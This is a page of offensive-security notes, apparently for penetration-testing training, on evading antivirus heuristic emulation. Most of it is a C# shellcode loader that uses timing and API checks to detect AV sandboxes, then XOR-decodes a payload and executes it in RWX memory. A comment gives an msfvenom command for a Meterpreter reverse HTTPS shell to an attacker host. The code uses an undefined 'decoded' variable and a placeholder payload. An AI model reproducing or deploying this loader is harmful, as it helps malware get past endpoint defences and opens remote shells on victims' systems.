Evade Heuristic Behaviors

Most AV products implement heuristic detection that simulates the execution of a file. This behavior analysis can be evaded by determining if the file is being ran by a simulation or by a user.

Examples from: https://github.com/chvancooten/OSEP-Code-Snippets

Below is an example of a C Sharp Program that uses basic heuristic evasion

Basic Heuristic Evasion

using System;
using System.Collections.Generic;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading.Tasks;

namespace non_emulated
{

    class Program
    {
        [DllImport("kernel32.dll")]
        static extern void Sleep(uint dwMilliseconds);
        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint
        flAllocationType, uint flProtect);
        [DllImport("kernel32.dll")]
        static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize,
        IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
        [DllImport("kernel32.dll")]
        static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32
        dwMilliseconds);
        [DllImport("kernel32.dll")]
        static extern IntPtr GetCurrentProcess();
        [DllImport("kernel32.dll", SetLastError = true)]
        static extern UInt32 FlsAlloc(IntPtr callback);
        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);
        static void Main(string[] args)
        {
            DateTime t1 = DateTime.Now;
            Sleep(2000);
            double t2 = DateTime.Now.Subtract(t1).TotalSeconds;
            //we can inject a two-second delay, and if the time
            //checks indicate that two seconds have not passed during the instruction, we assume we are
            //running in a simulator and can simply exit before any suspect code is run
            if (t2 < 1.5)
            {
                return;
            }
            //If the API is not emulated and the code is run by the AV emulator, it will not return a valid address.
            //In this case, we simply exit from the application without performing any malicious actions, similar
            //to the implementation using Sleep.
            IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4, 0);
            if (mem == null)
            {
                return;
            }
            //some AV emulators will return a failing condition when FlSAlloc is called
            UInt32 Fls = FlsAlloc(IntPtr.Zero);
            if (Fls == 0xFFFFFFFF)
            {
                return;
            }
            // additional AV evasion can be found here: https://githubmemory.com/repo/cinzinga/Evasion-Practice

            //sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.X.Y LPORT=443 -f csharp --encrypt xor --encrypt-key J
            //xor payload
            byte[] buf = new byte[637] { x64 Payload };

            for (int i = 0; i < buf.Length; i++)
            {
                buf[i] = (byte)(((uint)buf[i]) ^ 0x4a);
            }
            int size = decoded.Length;
            IntPtr addr = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40);
            Marshal.Copy(decoded, 0, addr, size);
            IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
            WaitForSingleObject(hThread, 0xFFFFFFFF);
        }
    }
}

Phishing MACRO

Launches when macros are enabled.

ASPX

When file upload is availble

HTA

PreviousAMSI BypassNextProcess Injection

Last updated

Was this helpful?